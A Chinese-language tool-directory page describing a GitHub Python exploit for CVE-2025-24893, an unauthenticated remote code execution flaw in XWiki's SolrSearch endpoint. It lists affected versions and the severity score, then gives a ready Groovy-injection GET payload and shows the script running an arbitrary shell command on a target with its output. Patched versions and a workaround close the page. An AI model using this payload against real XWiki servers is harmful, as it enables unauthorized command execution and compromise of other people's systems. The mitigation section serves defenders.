Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893 — CVE-2025-24893 的 Python 漏洞利用,这是 XWiki Platform 中的一个严重未认证 RCE,允许通过向 SolrSearch 端点发送特制 RSS 请求执行任意 Groovy 代码。 | Kitploit
工具/GitHubGitHub/b0ysie7e/cve-2025-24893
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

CVE-2025-24893 的 Python 漏洞利用,这是 XWiki Platform 中的一个严重未认证 RCE,允许通过向 SolrSearch 端点发送特制 RSS 请求执行任意 Groovy 代码。

查看仓库
1131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24893 漏洞利用

CVE-2025-24893 是一个影响 XWiki 平台 的 关键未认证远程代码执行 (RCE) 漏洞。
该漏洞允许任何访客用户通过向 SolrSearch 端点发送特制的 RSS 请求,在无需认证的情况下注入并执行任意 Groovy 代码。

这直接影响受影响系统的 机密性、完整性和可用性。

摘要

  • 受影响版本:
    • XWiki ≥ 5.3-milestone-2 至 < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 至 < 16.4.1
  • CVSS v3.1 评分: 9.8 (严重)
    向量: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 可利用性: 非常简单 — 单个 HTTP GET 请求即可。

⚠️ 免责声明:

本代码仅供教育和研究目的使用。未经明确许可在系统上使用可能构成违法。
作者不对任何滥用或恶意行为负责。

概念验证 (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

漏洞利用脚本使用手册

本节说明如何设置和运行 Python 漏洞利用脚本以利用 CVE-2025-24893。


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

缓解措施

更新到已修复版本:

要修补该漏洞,请将 XWiki 更新到以下版本之一:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

临时解决方法:

如果无法立即更新,可以应用临时修复:

  1. 编辑文件 SolrSearchMacros.xml(位于 Main.SolrSearchMacros)大约 第 955 行。
  2. 将输出逻辑替换为使用 rawResponse 宏,并将内容类型设置为 application/xml。
    以 macros.vm 中 第 2824 行 的实现为参考。

参考链接:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
下载工具